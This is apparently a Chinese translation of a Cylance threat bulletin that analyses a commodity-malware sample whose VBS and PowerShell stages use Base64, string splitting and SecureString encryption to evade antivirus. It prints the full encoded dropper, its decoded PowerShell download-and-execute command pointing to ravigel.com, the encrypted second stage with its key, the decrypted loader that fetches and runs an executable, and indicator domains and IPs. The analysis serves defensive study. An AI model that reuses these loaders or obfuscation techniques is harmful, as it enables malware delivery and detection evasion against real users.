Powershell混淆——使用安全字符串

一、简介

你认为现在威胁行为者的生活将会非常艰难，因为有大量的安全公司正在为不断增长的恶意软件黑名单提供数百万有效载荷指纹。

你认为恶意软件绕过防病毒产品将是一项艰巨的任务，需要开发新的、从未见过的自定义恶意软件。

如果你想法与上述其中任何一个相似的话，那么你就错了。

威胁行为者越来越多的使用所谓的商业恶意软件（无论是免费还是象征性收费的，您可以在线找到现成的程序），而不是自定义的有效载荷。这些商业软件是所有防病毒公司都知道的恶意软件，其指纹（或“签名”）能够立即被识别。

那么为什么威胁行为者越来越多的使用商业恶意软件？他们为什么能成功这样做？

对这两个的问题简短回答是：混淆。

在此威胁情报公告中，Cylance解释了混淆是什么以及它为何起作用。我们演示了最近观察到的混淆技术是如何成功绕过大多数防病毒产品的。

二、背景

Cylance一直在追踪一种趋势，即威胁行为者越来越多的转向普通的商品恶意软件。他们这样做是因为它便宜，易于使用，并且有助于匿名化。当一个恶意软件的指纹为众人所知并且在每个人都可以接触时，威胁行为者可以隐藏在一组不可能的嫌疑人中。有效载荷签名基本上变得毫无意义。

尽管具有已知签名，商品恶意软件如何成功仍然是一个问题，这就需要借助混淆。这种技术可以有效地改变整体签名，尽管传播的是熟悉的有效载荷。

混淆将攻击者的注意力从定制最终有效载荷转移到定制传播方法。可以认为这种转变是对许多防病毒产品捕获恶意软件方式的回应。

如上所述，许多防病毒产品依靠签名来识别恶意软件。对于他们中的许多人来说，签名只是一个哈希或一个简单的字符串。在此上下文中，哈希是指一段恶意软件的唯一字符串。签名通常是哈希值，但它们也可以是一段恶意软件中唯一一段代码的其他简要表示。

混淆是一门技术，它描述了一系列用于规避严重依赖签名的反病毒产品的技术。这些技术在不改变功能的情况下改变了恶意软件的整体结构。通常，这会产生层层嵌套，这些层可以掩盖最终的有效载荷，就像俄罗斯玩偶套娃一样。

常见的混淆技术包括：

· 压缩或“打包”恶意软件程序的打包程序

·加密算法，加密恶意软件程序（或其部分）

· 其他混淆器，以各种方式改变恶意软件程序，从而改变程序中的总字节数

这些混淆技术的效果是通过改变文件的大小（例如打包）或通过加密从反病毒产品中隐藏其唯一的代码串来改变恶意软件的散列以及签名。

虽然一些防病毒产品会搜索常见的混淆技术，以便列入黑名单，但这种做法并不像恶意软件有效载荷签名的黑名单那样完善。

在下面的技术分析中，我们剖析了一个样本，其混淆方法利用了PowerShell的功能，PowerShell是Microsoft Windows内置的工具。

三、技术分析

Cylance正在分析的恶意软件文件使用了罕见的PowerShell混淆方法，同时找到一些新鲜且很少被检测到的恶意脚本。该样本使用了 Daniel Bohannon 描述的几项技术。我们分析是一个包含PDF文档和VBS脚本的ZIP文件：

50e7fe23731ad94f1714c1a8acfce3f8b6e6e918b3e3aa1daa7275cb6052e68c.

在我们发现它时，该文件仅由三种产品检测到：

VBS脚本使用基本的Base64编码来混淆第一层。该脚本的内容如下所示：

Function l(a): With CreateObject("Msxml2.DOMDocument").CreateElement("aux"): .DataType = "bin.base64": .Text = a: l = r(.NodeTypedValue): End With: End Function 
Function r(b): With CreateObject("ADODB.Stream"): .Type = 1: .Open: .Write b: .Position = 0: .Type = 2: .CharSet = "utf-8": r = .ReadText: .Close: End With: End function 
Execute l("RnVuY3Rpb24gR2V0VGltZVpvbmVPZmZzZXQoKQ0KICAgIENvbnN0IHNDb21wdXRlciA9ICIuIg0KDQogICAgRGltIG9XbWlTZXJ2aWNlIDogU2V0IG9XbWlTZXJ2aWNlID0gXw0KICAgICAgICBHZXRPYmplY3QoIndpbm1nbXRzOntpbXBlcnNvbmF0aW9uTGV2ZWw9aW1wZXJzb25hdGV9IVxcIiBfDQogICAgICAgICAgICAgICAgICAmIHNDb21wdXRlciAmICJccm9vdFxjaW12MiIpDQoNCiAgICBEaW0gY1RpbWVab25lIDogU2V0IGNUaW1lWm9uZSA9IF8NCiAgICAgICAgb1dtaVNlcnZpY2UuRXhlY1F1ZXJ5KCJTZWxlY3QgKiBmcm9tIFdpbjMyX1RpbWVab25lIikNCg0KICAgIERpbSBvVGltZVpvbmUNCiAgICBGb3IgRWFjaCBvVGltZVpvbmUgaW4gY1RpbWVab25lDQogICAgICAgIEdldFRpbWVab25lT2Zmc2V0ID0gb1RpbWVab25lLkJpYXMgLyA2MA0KICAgICAgICBFeGl0IEZvcg0KICAgIE5leHQNCkVuZCBGdW5jdGlvbg0KDQoNCg0KDQoNClNldCB2ZXJ0dSA9IENyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpDQoNCnZrMj0iZXJTIg0KDQppZiBHZXRUaW1lWm9uZU9mZnNldCA9IDkgdGhlbg0KDQoJRGltIGh1bW0NCglodW1tPSJvZmZpY2UiDQoJdHNzMT0iUG93Ig0KCW9rb2w9InNzIC1jIg0KCW5vcDM9ImhlTGwiDQoJbXVyPSJsZSBoaWQiDQogICAgdmVydHUuUnVuKHRzczErdmsyK25vcDMrIiAtd2luZG93c3R5IittdXIrImRlbiAtbm9leGl0IC1leGVjdXRpb25wb2xpY3kgIGJ5cGEiK29rb2wrIm9tbWFuZCBJYEVYICgobmVXYC1PYmpgRWNUICgoJ05ldCcrJy4nKydXZWJjJysnbGllbnQnKSkpLigoJ0Rvd25sb2Fkc3QnKydyaScrJ25nJykpLkluVm9rRSgoKCdodCIrInRwOicrJy8iKyIvcicrJ2F2JysnaWcnKydlbC5jb20vMScrJ2NyLicrJ2RhJysndCcpKSkpICIpDQoJU2V0IHZlcnR1ID0gTm90aGluZw0KCVdTY3JpcHQuUXVpdA0KCWVsc2UgDQoJdG9wPTENCmVuZCBpZg0K")

图1：初始VBS脚本的内容

此脚本解码为：

Function GetTimeZoneOffset() 
   Const sComputer = "." 
   Dim oWmiService : Set oWmiService = _ 
      GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _ 
          & sComputer & "\root\cimv2") 
   Dim cTimeZone : Set cTimeZone = _ 
      oWmiService.ExecQuery("Select * from Win32_TimeZone") 
   Dim oTimeZone 
   For Each oTimeZone in cTimeZone 
      GetTimeZoneOffset = oTimeZone.Bias / 60 
      Exit For 
   Next 
End Function 
Set vertu = CreateObject("WScript.Shell") 
vk2="erS" 
if GetTimeZoneOffset = 9 then 
          Dim humm 
          humm="office" 
          tss1="Pow" 
          okol="ss -c" 
          nop3="heLl" 
          mur="le hid" 
   vertu.Run(tss1+vk2+nop3+" -windowsty"+mur+"den -noexit -executionpolicy bypa"+okol+"ommand I`EX ((neW`-Obj`EcT (('Net'+'.'+'Webc'+'lient'))).(('Downloadst'+'ri'+'ng')).InVokE((('ht"+"tp:'+'/"+"/r'+'av'+'ig'+'el.com/1'+'cr.'+'da'+'t')))) ") 
          Set vertu = Nothing 
          WScript.Quit 
          else 
          top=1 
end if

图2：初始VBS脚本解码后的内容

此VBS脚本下载并执行文件“hxxp://ravigel[dot]com/1cr[dot]dat”。详细PowerShell命令为“PowersheLl -windowstyle hidden -noexit -executionpolicy bypass -command IEX（New-Object Net） .Webclient）DownloadString.Invoke（ 'hxxp://ravigel[dot]com/1cr[dot]dat'）”

许多技术，如通过串联和变量赋值进行字符串拆分、使用刻度“`”和随机字母，都可用于分割防病毒公司通常依赖的用于进行恶意PowerShell识别的关键词或签名。

“1cr.dat”文件是事情变得有趣的地方。它使用C#中固有的字符串加密方法，称为SecureString，或者更具体的说是“ Marshal.SecureStringToGlobalAllocAnsi ”。这通常用在Microsoft内置DPAPI用于加密应用程序中的敏感字符串。

. ( $ShelliD[1]+$SHeLLid[13]+'x')(([runtiMe.inTERopsErvICes.MArsHAL]::pTRTOstRINGAnsI( [rUntIME.intEROpsERVICeS.MArshAl]::SeCUReSTRiNGToGLObalALLocansI( $('76492d1116743f0423413b16050a5345MgB8ADEAbQAxAE4AZwBKADcAWQBYAFcAaABjAGQAQwBRAFYAVgBrAGIAZQBBAHcAPQA9AHwAYgA2ADAAZAAwAGIANQBiADQAMgAyADUAYgAwADgAOQBkAGMANQBlADkAYwAyADgAOQBmAGUAMgA5AGIAMgAwADEAMgAzAGUAMQBlAGEAYQBkADgAMgBkAGYAZgA4AGYAZAAyADIAZAA0AGEAZgA1ADkANQA3ADQAMQAwADcANQAwADIAMwA4ADAAYwBiADAAOAA5ADQANgA3ADcAMwAwADgAMgA2AGIAMgBjAGIAOAA5AGQANABhADYAZQA3ADYAYwA2AGIAMAA3ADcAOABlADgANgAxAGMAOAA5ADUANgBiAGQAMwBkADMAMQA4ADEAMgA4ADEAYwBmAGUANQAxADIAOAA2AGIANgA4ADAAOQA0ADYAZgBmADEANwBlADAAMAA5AGMAMwBiADMAYwBhADUANwA2AGYAMwBhADIANQA3ADYAMAA1AGMAYgA0AGQAZQA4AGIAMQAwADkAZQBlADkAMwA4AGIANgA3AGQAYQA1AGEAZABlAGYAMgBhADMAMQA0ADQAYgAxADAAYQAxADkAZAAzADcAYgBjADgANgBmADYAOAA0ADYANwBmADIAZQBhADQANQBlAGEAZQAzADMAZQA5ADgAZAA3AGIAMwA3AGEAZABkADMAMQBkAGUAZAA2AGQAOQBlADcANgAyADAAMAAwADEAOQBjADEAMQBmAGYAOQBjADUAZQBjADYAYgA1ADQAMgA4ADAAMABiADUAMQA2ADcANAA4AGMAMQBiAGQAOQA5AGIAMgAwADAANwA2ADgAMwBlAGUANAAwADAAMwAwADIAMwA5AGEAOQA4ADQAYgA2ADkAYQAwADEAZAAwADgANAA1AGQAOABmADIAOABiADcANgBlADgAOABmAGYAYgBmADUAOAAxADUAYwA1AGIANwA0ADgAMgAwAGQAOABmADQANAA3ADYAMgA4AGYAYgBiAGMANQBmAGEANQAzADIAMQAxADIANwA2AGMAZgBiADgAYQAwADEAMQBkADcANwAyADgAYwBmAGIAOQA2AGYAMwA5ADgANAA4ADUAOAA4ADIAYQA4ADMANAA0AGQANABkAGYAMgA5AGIANABhAGYAYQAzAGUANwA4ADAANwAzADIANQA0ADEAYwBhAGQANwBkAGIAMgAxAGMAZABmAGMAMAA2AGYAYwA5ADMAYgA5ADIAMAAwADIANwAzAGUAZAAyADUAMgA4AGEAZQA2ADIAOAA3ADQAOAAxADQAYQBiADYANAA0ADgANQBhAGYANQA4AGMAYwA0ADUANgBhAGMAYgA5ADMAYQBmAGUAYwBmADgANQBlADMAMQA5AGEAMQA5ADcAOABjADYAZgAyADAAMgA4ADgANwA3AGIAMwBmADcANQA5ADQANwBjADYAZgBiAGEAMgBlADEAMABkAGMANAAxAGQANwA2ADIANgA1ADcAYgAwAGYAMwAxADQAMABkADQANwAxADcAOAAxAGYAMgAxAGYAYQBlADYAMQBlADIANgBiADMAMwAzADQAZQBmADYAMQA5ADQAMgAyADMANABlADkAMQA3AGYAYwA0AGYAMwAxADQANwAyAGUAMgAyADkAZgAwADcAZgA3ADkAMwBkADEANwAyADAAZgBkADgAMABmAGMANQA2AGYAMQBkAGIAOQAxADUAZgAzADUAYwA4AGIANwBhAGUANgA5ADQANAAxADIAZABhADAAMgA0ADQANABiADEAZAAxADgANAAwAGEANgBkADAAOQAwADAAMgBkADIAOQAzADQAZQBlAGYAYwA5AGMANQA5AGEAYgAxADUANgBkADIANgBhADgAOQBmADYAOABlADUAMgA4ADgAMwAxADAAMgA5ADkAYQBlADcAOQA1AGEANwBmAGUAZABkAGYAZgA1ADUAMwBkAGUANwBmADUAOQBkADgAMwA4ADkANQBhAGIAZQA3AGQAYwA0ADkAOABlAGUAMQA1ADMAYQBlADAAMgA2ADcAMwA0ADMAYgAwADIAZgBmAGIAYQA2ADUAOQBjADIAYgA4AGQAOAAwAGYANgBiADIANwBkAGEAZABiAGMANAA3ADAAOAA4ADgANgBhADAAYgA4ADcAZQA2ADgAMwAzADAAMAAzADQAOQA3AGEANgA2AGYAMwAzADgANQBiAGMANgA1ADYAYwA2ADkAYwA5ADIAZAA3AGIAMwA2AGIAYQA5ADkAMgAxAGYAMAA1ADEAMAA5ADYANAAxADUAMABiADEANAA4ADgANAAzADYANAA0ADMANgBhADQAYgA1AGQAYwA4AGUAYQBkADMAYwA5AGYAMABlADEANQA2ADYANQA4AGYANABlADcAOABmADAAMgAzAGQAYwA2AGIAOQA0ADIAZABmADQANQAwADMAZQAxAGEAOQBkADAAYQA0ADUANwBhAGMAYwA2AGEANwA0AGIAYwBkADUAYQA3AGIANgBiAGYANQBlAGMANgBmAGUANwBlADAANABhAGQAMQA4ADMAZAA0ADQANQBlAGQAMgBjADQAZQAxADcAYQBlADMAZgBmAGEAZABlAGYAYQBiAGUANgA5ADgAZgAyADYAOAA4ADcAOQAxAGQANgAyAGUAZgBiADYAMAAwAGMANAA5ADkAMgA3ADUAMABlADIAYwBhADUAMQAwAGMAMABlADQANAA3ADQAYwAwAGYAZQA0ADQAYwA1ADgAYQA2ADMAYQBjADAAZABiADkAYQAwADAANABiAGQAMwA0ADcANAAzAGQAMgA2ADEAOQBmADgAZQA0AGEAMQA0AGMAYgA0ADEAMQA2ADUANgA5AGIAMgBmADEANABiAGQAYwAwADkAMAAxADkAZgAyAGQAZgBiAGUAYQBmAGMAZQBlADcAZAAyADIAOQAyADEAYwBiADMANABlAGYANQBkADkAMABiADUAYgBkADIANQA5ADEAYgAzADYAYQA3AGMAMgA1AGEANABmADgAYwBiAGEAOQBlAGYAZQA5AGUANABjAGYANwAzADQAYgBmADUAYwBmADcAYQAyAGQANABlADMAZgAyADYANwBlADAAOAA3ADgANAA0AGMAYgAwAGQAOABiAGIAMQA3AGYAMwA2ADUAMQBiADYANQBlADAAZQA5ADQAMwBmADgAOAA0ADIANwBjADUAOQBjAGYAZQAzADUANgA3ADUANgA2AGYAZQA2ADMAZgA4ADcAOQBlADMANwA3AGEAZQA3ADMAOAAxAGMAZgAyADIAMQAwADAAZQAzAGYAMQA4AGIAYgA4ADMAZQAwADUAMQBhADgANwA1ADMANQA4AGMAOAAzAGYAYQAxADcAYgBmAGMAOQA4ADMAMgAxAGQAZgBmADYAYQA0AGIAMABmAGIAMQBhADYAZQBmADkAYgBkADMAMQA4ADEAOAA4ADIAYgA2ADUAMgA0AGEAOAAxADAAYgA4AGUAYgBjAGMAZgA3ADEAZABiADMAYgAzADIAMABmADcAOQAzADkAOAA0ADcAOQA2ADEAOQA1ADkAMwA1ADgAOQBkAGYAMQA1ADAANwAxAGQAMgA4ADkAYwAwADgAMgAwAGUAZgAzADYAOQBhAGUANwBlAGMAMQBkADQANABkADAAOQAzAGUAZgBhADQANAAyAGEAMgBiAGQAMgBmADUAYgA5AGQAMgBkADEAMQA1AGMAYwBjAGYAOQBjADUAOAA2ADAANgAwADAAZQA3AGIAMABiADIAYQBkADcAZgA3AGIANgBmADMAMQBhADIAMAA1ADAAYgAxADQANgA5ADQAMgBhADMAOAA2ADgAOQA4AGEAYgA0ADcAYQAxAGYANQA4ADIAMgBiADYAYQBkAGMAMQBiADIANABhADEAZABhADMAMAAzADcAMgAyADMANAAzADQANAA1ADkAYwBmADIAOAA2ADUAYgBhADUANgAwAGYAMgBiADAANwBmAGUANwA5AGIAMgAyAGUAZAA4ADkANwA4ADEAYgBmAGUANwA4ADgAMAA5ADkAMwBhAGQANQA0ADkANwA3AGUAYQA0AGEAZQA0ADYANwA2ADcAMAA4ADgAOAA4ADkANAA0ADgAOAA5ADQANwAxADkAZAA3AGUAMgBlAGYAZQBhAGQAOQBkAGUAZQAyADkAZgA3ADkANQBkADUAMwAwADkAYgAzAGIAOAAwAGMAZQAyADUANQBlADUAOAA1ADkANABmAGIAMQA5AGMAZABkADgAOQA1ADgANAAwAGEANwBkAGIAMQBiAGYAOABkADcAYQBhAGMANAAyADcANgAzAGEAYwBmAGUAZQBjADAAYgAzAGMAYQBiADIAYwA5AGYAZgA2AGQAYwA5ADEAMgAzADQAYQA5AGYAZQBhADUANwA4ADgAZQA2AGQAMwA4ADQAMABlADUAOQBjAGMAMgBjADIAOABlADQAMQA4ADIAZgA2ADcAYwBiAGUAZQAyAGYAOABhADYAOAA3ADMAZgA4AGEAMAAzADMANQAyADgANwA5AGYAYwBlAGEAZgBmADMAOAA1AGUAYgA2ADMAYgBkADIAZQBlADUANwA2ADAAMABiADMAZgBkADUAZgBjADkAOQAzADYAYQBkAGUAMAAwADcAMwAzADkAMwA0AGIAOQAyAGQAMgA5ADYANQBmAGUANwA5ADcAMQAwADQANgAzAGEAOAA1ADQAMQBiAGMAZgAxADkAMQBhAGQAYQA3AGUAZQBkAGQAZQA1ADIAMwA5ADEANQBjADYAYwA4ADEAZgAwADcAMABjADUAYwBlADcAZQA2ADcAZgBkAGIAMgAzAGYAZQA1AGMAMgAwAGQANwA3ADYANgA0ADEAMgA3ADgANQA2ADIAZgAxADYAZAA1AGEAZgA5ADIANwBkADMANQA0AGUANQA1ADMAZAAzADgAMABlADEAZgBmAGEANQAxAGYAOABjADIAMQA5ADMAYgA0AGUAMAAxADcANgBhADUAZQAyAGQAZAAwADYAOABhADcAOAAzADIAMgAxADAANwBlAGEAMwBmADMAMAA0ADEAOAA5AGIAMwAzADcAZgAwAGMAMgAyADUANgBiAGEAOABjAGIAYgBiADAAYgBjADkANQBmADkAYgAxADYANgAyAGUAMQAwAGQAMABhADAAOABjADYAMgAwAGUAOQA1AGQAOAAzADYAMgBjAGEAYgAyADgANgBmADMAMQBmADAAYQBiAGIAZABkADkAZgBkAGQANQAwADIAZQBjAGUAZAAxADMANQBkAGEANABiAGIAZQA0ADgANQA4ADYANwBjADMAOAA2ADcAYQAwADMAYwAwADQAYgBkADcAOQA4AGMANwBjAGMAZAAxADMANABlADMAMQAxADgAMgBhAGYAYgBiAGIAMQAwAGEAMwA0ADUAZgA0AGQAZQBmADMANwA5ADIANwA3AGEAZABmAGMAMgBiADIAMABlADcAYQBlADQAZgA4ADEAZAAxAGQAMgBkADkAOQA3AGEAOABmADAAYwAxADAAYQA1ADYAMQA4AGYAMAA3AGIANgA5ADAAYQBkADkAMwBjAGMAMwAzADQANwAyADkAMAA5AGYANQAwADkANwAxAGUANwBkAGEAYwAwAGUAMgBhAGQAOABiADQANABlADAAZQA3ADUAZAA4ADIAYwA2ADkANgAyADYAYgA5ADMANwA1ADYANwBhAGUAYQAzAGIAYgBhADEAMwA1AGUANABmADMAMAA5ADkAOQAxAGYAYQBmAGEAYQAwAGEAOAAwADAAMgBjAGEAMQAxAGMAZAA5AGUANQAyAGEAMAAxADQAZQBmAGEANgBhAGMAMwBjADQAMAA0ADcAZQBiADgAMgAzAGEANgA2ADEAYwBjAGQANQBjADIANAA0ADcAMQBmAGMAZABkADAANAA4ADQANwA0ADIAOAAxADcAZQA1ADMANQA1AGEAZgBjAGMAYwBiADcAYwAyAGIAYQBhAGYAYQA5AGUAMwBkADYAYgAzADQANwA5ADIAZAA0ADEAZQA2AGMAZAA5AGYAMAAzAGMAMAA1AGIAMAAwADIAZgA3ADEAMABmAGQAMgBkADkAZQA2ADYAMwA5ADkAOQBiADkANwAwAGYANABiADIAMwA1ADIAZgA3ADMANgBiADQAYwBmADgAZAAzAGUAZQBkADgANgAwADAAYwA2AGEAOAA3AGQANABmAGQANAA2ADAAMgBjAGQAZgBjAGUAMwBjADQAZgBmADAAOAAwADkAOABiADcAOQBiAGUAYQBhAGQANQAyADcAMQA0ADgAZgA5AGUAOAAwAGIAOQAwAGYAYwBlADMAMQBhAGEAYgBmADQAZgAyAGMAYgBkADYAZAA3ADkANAAxADUAMgAwAGYAMQBjADIAZQA3ADgAMwAyADgAOQA1AGMANwA3ADQANABkAGQANwAyADUANgA4AGQANAAxADQAZAAwAGQAZgA0ADEANABkADAAZAA5ADYANQBiADYAOAA2ADIAMQAzADgANQBiADcANwA0AGQAMgA0ADQANgA3ADQANQA4ADQAYwBlADgANQBhADgAMABhADAAMAA5ADUANAA3ADUAZgA1AGIAMwBmAGYAMwBlAGUAYgA2ADcANwA2ADgAOQA5ADIANwBkAGIANwA4ADMANwAyADMAZAA5ADcAYwBjADgAMABiADUAYwA2ADkAZAAxAGIAOQA0ADgAYQBjADQANQA2ADQANAAwAGQAOQAxADUANgA4ADYAMQA5AGQAZABiADgAYwA4ADgANABhADAANgBkAGYAMABkADgAMQA4AGYANQBjAGEAMgAyADMAZgBiADIAOABhADUAMwAxAGUAYgA1AGUAZQBjAGMAYgBmADUANgA3ADkAZQA0ADkAYwAzAGEAZgBkADEANwA5AGIAZgA1ADkAZgA5ADYANwBhADUAOQBmAGMAMABkAGQAYgBjAGQAMwBhADIANgA1AGEAYgA1ADQAYwA2AGIAMwBlADAANAA4ADIAOQA1ADAAMAA3AGIAOQBlAGUAMAAxADMAYgAwADMAOQA1ADEAMQA3AGUANQAyAGMAOAA4ADgAYwBiAGUAYQAzADQANQAzADQAOQAwAGUAMgA3ADEAMgBhAGYANwA4ADUAZQA0AGEAZQAzADgAOQAyADcAOAAxADEANAA4AGQAMQBlADAAYQA1ADkAYwA1AGMAMgBlADIAYQA4AGYANQAzAGEAYwA4AGUAMwA0ADIANwAwAGQAZQAxADgANgBhADcAMAA5ADQAMgBmADUANgA1AGEAZQAzADcAYwA5ADkAMgBkAGUAOAA1AGIANwBlADgAMwA2ADcAOABkADIAYQBlAGEANQBkADEAMwBjADIAMAA1ADQAOQAxADgAMQA1AGQAZAA4AGUAMQA2ADIAMAA0ADIANwA0ADgAYgAzADEAMABiADYAYQBhAGMAMgA3AGIANwAzADcAMQBlADcANwBiADQAMwBhADUAZQAyAGMAMwBlADUANQA5AGMAZAAyADEAYQA4ADAAMgBjADUAZgBiAGYAMgA1ADQANQAzADYAYwBhAGQAMQAzADAANgA1ADgAZQA3AGYAZgAzAGUANwBjADYAMABhAGIAOQA4AGUANwAyADMAMgA0AGMANQAzADIANwA2ADUAMwAzADUAOQA1ADYAMQAxADYANABjAGYAOQA1ADEAMQBmADUAZQAyADcAMAA0ADYAYQBjADcAMAAxAGEANQBiAGMAMwA4ADAAMwBkADUAYwAyADkAYgAzADcAOQA2AA==' | COnVErtTo-SecUrEStrING -Ke 145,96,34,150,165,222,211,99,165,119,17,98,225,14,249,255) ) ) ) )

图3：cr1.dat的内容

使用脚本末尾的16byte密钥“0x91, 0x60, 0x22, 0x96, 0xa5, 0xde, 0xd3, 0x63, 0xa5, 0x77, 0x11, 0x62, 0xe1, 0xe, 0xf9, 0xff”来解密“cr1.dat”的内容。该字符串解码为：

do{ 
    sleep 41; 
    ping -n 6 -w 100 www.microsoft.com > $env:tmp\license.pem; 
    $rpm=Get-Random; 
    $ruf = $env:public; 
    (New-Object System.Net.WebClient).DownloadFile.Invoke("http://ravigel.com/top.dat","$ruf\$rpm.zip") 
    } 
while(!$?); 
$mall = New-Object -ComObject shell.application;sleep 7; 
$holl = $mall.NameSpace("$ruf\$rpm.zip"); 
foreach ($item in $holl.items()) 
{ 
    $mall.Namespace("$ruf\").CopyHere($item)}; 
    gci -Path "$ruf\" -Filter *.tab | ren -NewName "$rpm.txt"; 
    gci "$ruf\$rpm.txt" | % { (gc "$ruf\$rpm.txt") | ? { (1) -notcontains $_.ReadCount} | sc -path $ruf\$rpm.txt }; 
    [string]$hex=get-content –path $ruf\$rpm.txt; 
    [Byte[]] $temp=$hex –split ‘ ‘; 
    [System.IO.File]::WriteAllBytes("$ruf\$rpm.exe", $temp); 
    &Start-Process $ruf\$rpm.exe

图4：cr1.dat中解密后的字符串

第一组指令是试图击败自动沙箱解决方案。脚本本身会下载文件“ravigel.com/top.dat”，这是一个包含另一个名为“top.tab”文件的ZIP存档。 “top.tab”是一个PE文件，由每个十六进制字节的序数表示编码，由空格字符分隔，取前面标有“google\r\n”。

f = open(‘top.tab’,’rb’).read() 
h = f.replace(‘\r’,’’).replace(‘\n’) 
h = h.split(‘ ‘) 
out = ‘’ 
for b in h[6:]: 
    out+=chr(int(b))

解码后，二进制有效载荷的哈希值为：

f3cf988a64c1732b6b58a72922e93d182ba64298f6beae5de0c8de21477a9474

当犯罪分子首次部署时，该有效载荷仅由两种产品检测到，但在我们遇到它时，有18种产品能检测到。该有效载荷是安全社区广为人知的简单间谍工具。它被认为是商品恶意软件。它与C2 “siberponis [dot] com”通信，此外还配置为与备份服务器“baferdifo [dot] com”通信，此服务器当前尚未解析到IP地址。

四、总结

威胁行为者使用混淆技术试图领先当前的检测方法。最终结果是恶意软件在逃避防病毒产品方面更有效，如果样本被捕获，也很容易修改。

该趋势与信息安全空间中广泛持有的假设背道而驰，该假设认为高度定制的恶意软件与0 day攻击相结合是最值得关注的。虽然这些 工具 的使用受到关注并且应该受到监控，但不应该完全放弃那些威胁行为者（包括高级威胁行为者），他们现在正在成功绕过防病毒产品，使用的工具不是“0 day”，而是“every day”。

附录

域名:

Ravigel[dot]com

Siberponis[dot]com

Baferdifo[dot]com

与siberponis[dot]com相关的IP地址:

149.129.220.242

161.117.9.13

212.92.98.68

46.21.248.199

47.74.189.69

78.155.206.114

85.119.150.167

92.53.66.244

92.53.77.108

95.179.138.241

95.213.195.213

95.213.199.244